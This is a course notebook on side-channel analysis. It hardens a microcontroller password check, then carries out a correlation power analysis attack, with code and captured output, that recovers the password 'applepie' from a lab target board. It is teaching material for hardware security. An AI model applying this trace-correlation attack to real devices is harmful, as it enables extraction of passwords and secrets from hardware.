# Lecture 4: Password CPA Attack - Attack

In this example we want to improve the password check again to be resistant against the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from the last lecture:
```c
for(uint8_t i = 0; i < sizeof(stored_password); i++)
{
    if (stored_password[i] != passwd[i])
    {
        password_wrong = 1;
    }
}
```

The differences attack discussed in the last example worked because of the different power consumption when executing the code inside the if clause. This is addressed by the following code.

```c
uint8_t password_wrong = 0;
for(uint8_t i = 0; i < sizeof(stored_password); i++)
{
    password_wrong |= stored_password[i] ^ passwd[i];
}
```

This is an excerpt from `4_password_fixed.c`.

## Pearson correlation coefficient
An interesting statistical formula to face this problem is given by the *Pearson correlation coefficient*. For two random variables $X, Y$ it is defined as

$$\rho_{X,Y} := \frac{\mathrm{Cov}(X, Y)}{\sqrt{\mathrm{Var}(X)} \sqrt{\mathrm{Var}(Y)}} \ \in [-1, 1]\,.$$

For two samples of finite length $x = {x_1, ..., x_n}$, $y = {y_1, ..., y_n}$ it can be defined as 

$$r_{x,y} := \frac{\sum_{i=1}^n (x_i - \bar x)(y_i - \bar y)}{\sqrt{\sum_{i=1}^n (x_i - \bar x)^2}\sqrt{\sum_{i=1}^n (y_i - \bar y)^2}} \ \in [-1, 1]\,,$$

where $\bar x := \frac{1}{n} \sum_{i=1}^n x_i$ is the mean of a sample $x$.

<div style="background: #f0ffe0; padding: 15px; border: 1px solid slategray;">
<div class="h2" style="font-variant: small-caps;">Exercise 1</div>
    
1. Implement Pearson correlation coefficient in python.
2. Test your implementation against the following (x, y)-data with `size = 50`:
    1. `(range(size), 5 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size))` => $r \approx 0.99$
    2. `(range(size), np.array(range(size)) + np.random.uniform(-size, size, size=size) + 10)` => $r \approx 0.32$
    3. `(range(size), -3 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 200)` => $r \approx -0.98$
    4. `(range(size), 100 * np.sin(np.array(range(size)) / size * np.pi + np.pi) + np.random.uniform(-size/10, size/10, size=size))` => $r \approx -0.05$
3. Visualize above example data.
</div>

In [ ]:
### Switched to Markdown
size = 50
data = []
data.append((range(size), 5 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size)))
data.append((range(size), np.array(range(size)) + np.random.uniform(-size, size, size=size) + 10))
data.append((range(size), -3 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 200))
data.append((range(size), 100 * np.sin(np.array(range(size)) / size * np.pi + np.pi) + np.random.uniform(-size/10, size/10, size=size)))

for i in data:
    print(append(person_correlation(i[0], i[1])))

## Attack

How to use this as principle for an attack?

We sae in the previous notebook that there is a _linear_ relationship between the trace at a given point and the hamming weight of the attempt. Now we can quantify a linear dependency!

So, we can develop an attack out of this principle:

1. Record traces with random input.
2. Focus on a point in the program where the input "collides" with the secret. In our case this is the XOR.
3. For each input compute a "forecast" of hamming weights. If we do this for all possible secrets we will see that there is one guess where the Pearson coefficient between the forecast and the traces at this certain point maximizes.

It is still open how to find the sweet spot. We just don't try to "find" it. We're just computing the Pearson coefficient for _every_ trace point and keep the best one.

<div style="background: #f0ffe0; padding: 15px; border: 1px solid slategray;">
<div class="h2" style="font-variant: small-caps;">Exercise 2</div>
    
Develop an attack using Pearson correlation coefficient.

1. Start with the first character:
   1. Capture a few hundred (~500) traces with random input.
   2. For each guess: Calculate the pointwise Pearson correlation between the forecast and the traces. Keep the absolute maximum of the correlations.
   3. Now keep the guess with the maximal correlation.
2. Extend the attack to all other characters.

Note: Due to interferences the correct character might not be the one with the highest Pearson coefficient. Thus it is worth to keep the best 2-3 guesses.

</div>

In [1]:
import pandas as pd
import bokeh
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import LinearColorMapper
from bokeh.models import CrosshairTool
from bokeh.palettes import Category10_10

output_notebook()

Loading BokehJS ...

In [2]:
import securec
from securec import util
scope, target = util.init()

In [3]:
securec.util.compile_and_flash('./4_password_fixed.c', cryptooptions=['CRYPTO_TARGET=TINYAES128C'])

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 3931 bytes
✓


In [3]:
import numpy as np
trace_samples = 500

scope.default_setup()
scope.adc.samples = trace_samples

def capture(attempt, count=1):
    if isinstance(attempt, str):
        attempt = attempt.encode('iso-8859-1')
    elif isinstance(attempt, int):
        attempt = bytes([attempt])
    traces = []
    for _ in range(count):
        scope.arm()
        target.simpleserial_write(0x01, attempt + b'\x00' * (10 - len(attempt)))
        result = target.simpleserial_read(0x01, 1)
        traces.append(util.capture())
    return np.mean(np.array(traces), axis=0), not bool(result[0])
    


In [4]:
def person_correlation(x,y):
    x_array = np.array(x)
    y_array = np.array(y)
    average_x = np.average(x_array)
    average_y = np.average(y_array)
    top = np.sum((x_array - average_x) * (y_array - average_y))
    bottom = np.sqrt(np.sum(np.power(x_array - average_x, 2)) * np.sum(np.power(y_array - average_y, 2)))
    return top / bottom


In [5]:
HW = [bin(n).count("1") for n in range(0, 256)]

def hw(n):
    if isinstance(n, str):
        return HW[ord(n)]
    return HW[n]


In [6]:
import random
import tqdm
import tqdm.notebook

trace_nums = 500


traces = []
inputs = []
for _ in tqdm.notebook.tqdm(range(trace_nums)):
    input = bytes([random.randint(0, 255) for _ in range(9)])
    traces.append(capture(input))
    inputs.append(input)
traces = np.array(traces, dtype=object)
attempts = np.array([list(a) for a in inputs])

  0%|          | 0/500 [00:00<?, ?it/s]

In [7]:
### Switched to Markdown
p = figure(width=900, height=400)
p.add_tools(CrosshairTool())

for i in range(5):
    p.line(
        range(len(traces[i][0])), 
        traces[i][0], 
        line_color=Category10_10[i],
    )
show(p)

In [8]:
def calculate_correlation(gues, gues_pos, attempts, traces, trace_pos):
    x = [hw(gues ^ attempts[i][gues_pos]) for i in range(trace_nums)]
    y = [traces[i][0][trace_pos] for i in range(trace_nums)]
    return person_correlation(x,y)


In [9]:
def get_max_value_pos_with_gues(guess, guess_pos, traces):
    cor_values = []
    for i in range(420):
        cor_values.append(abs(calculate_correlation(guess, guess_pos,attempts, traces, i)))

    max_value = max(cor_values)
    max_value_pos = cor_values.index(max_value)
    return max_value, max_value_pos


In [10]:
print(get_max_value_pos_with_gues(ord('i'), 0, traces))

(0.6706951101126043, 70)


In [11]:
def get_max_char_from_pos(gues_pos, traces):
    chars = list("abcdefghijklmnopqrstuvwxyz")

    max_value_per_guess_char = []

    for char in chars:
        max_value, max_pos = get_max_value_pos_with_gues(ord(char), gues_pos, traces)
        max_value_per_guess_char.append((char, max_value, max_pos))

    return sorted(max_value_per_guess_char, key=lambda item: item[1], reverse = True)
 

In [12]:
print(get_max_char_from_pos(0, traces))

[('a', 0.8743589437748555, 70), ('c', 0.7373401328323627, 70), ('i', 0.6706951101126043, 70), ('b', 0.6211538230346458, 70), ('q', 0.6139983370645564, 70), ('e', 0.6117004921711597, 70), ('p', 0.586682732955003, 121), ('h', 0.5664486087273161, 53), ('k', 0.5256126881480847, 70), ('j', 0.5123758692609609, 53), ('d', 0.5083265677098115, 71), ('x', 0.4860150218702879, 121), ('t', 0.48118544001405206, 121), ('s', 0.4785065662906659, 70), ('g', 0.47542299920445613, 70), ('w', 0.4477096378894403, 45), ('f', 0.43697721036452214, 56), ('l', 0.4318793618377758, 53), ('o', 0.42520988156408585, 43), ('r', 0.4209878508598204, 121), ('y', 0.4027952521395289, 70), ('m', 0.40205338569210336, 70), ('n', 0.388165137114116, 55), ('u', 0.3584214821430835, 70), ('z', 0.345636323579258, 56), ('v', 0.310842664736694, 121)]


In [13]:
### Switched to Markdown
for i in range(8):
    list_of_char = get_max_char_from_pos(i, traces)
    
    print(list(list_of_char[:3]))

[('a', 0.8743589437748555, 70), ('c', 0.7373401328323627, 70), ('i', 0.6706951101126043, 70)]
[('p', 0.8364073252460741, 110), ('q', 0.8152360531393119, 113), ('a', 0.7426422072994087, 113)]
[('p', 0.9076312502735139, 153), ('q', 0.7237318034202999, 153), ('t', 0.6602777276175108, 153)]
[('l', 0.8461067127435217, 190), ('x', 0.7371784800422861, 193), ('h', 0.7342966971918025, 193)]
[('l', 0.8570718877717052, 234), ('e', 0.84889519774639, 230), ('m', 0.8309298095467855, 233)]
[('p', 0.829341503309146, 270), ('u', 0.7719202700393553, 273), ('t', 0.7543857359721465, 273)]
[('p', 0.8501007772081981, 314), ('i', 0.8246871372855722, 310), ('q', 0.7956559733116297, 313)]
[('e', 0.764611419222818, 413), ('d', 0.6363585305607058, 413), ('m', 0.6210757823812101, 417)]


In [17]:
# Prints values which are with low distance
distance = 0.1

for i in range(8):
    list_of_char = get_max_char_from_pos(i, traces)
    print(list_of_char[0], end='')
    for a in range(1):
        if abs(list_of_char[a][1] - list_of_char[a + 1][1]) > distance:
            break
        print(list_of_char[1], end='')
    print('')


('a', 0.8743589437748555, 70)
('p', 0.8364073252460741, 110)('q', 0.8152360531393119, 113)
('p', 0.9076312502735139, 153)
('l', 0.8461067127435217, 190)
('l', 0.8570718877717052, 234)('e', 0.84889519774639, 230)
('p', 0.829341503309146, 270)('u', 0.7719202700393553, 273)
('p', 0.8501007772081981, 314)('i', 0.8246871372855722, 310)
('e', 0.764611419222818, 413)


In [18]:
# Store values with less distance for later try-out

test_str = ""
test_dict = {}


for i in range(8):
    list_of_char = get_max_char_from_pos(i, traces)
    
    if abs(list_of_char[0][1] - list_of_char[1][1]) > 0.06:  # 0.08
        test_str += list_of_char[0][0]
    else:
        test_str += ascii(i)
        test_dict[ascii(i)] = [list_of_char[0][0], list_of_char[1][0]]

print(test_str)
print(test_dict)

a1pl456e
{'1': ['p', 'q'], '4': ['l', 'e'], '5': ['p', 'u'], '6': ['p', 'i']}


In [19]:
# Calculate all combinations
from itertools import product

res = []
  
# constructing all possible combination of values using product
# mapping using zip()
for sub in [zip(test_dict.keys(), chr) for chr in product(*test_dict.values())]:
    temp = test_str
    for repls in sub:
        # replacing all elements at once using * operator
        temp = temp.replace(*repls)
    res.append(temp)
  
# printing result 
print("All combinations : " + str(res)) 

All combinations : ['appllppe', 'appllpie', 'appllupe', 'applluie', 'appleppe', 'applepie', 'appleupe', 'appleuie', 'aqpllppe', 'aqpllpie', 'aqpllupe', 'aqplluie', 'aqpleppe', 'aqplepie', 'aqpleupe', 'aqpleuie']


In [20]:
# Try all combinations
for attempt in res:
    _, password_pass = capture(attempt, count=1)
    if password_pass == True:
        print("Successfull : {}".format(attempt))
        break

Successfull : applepie
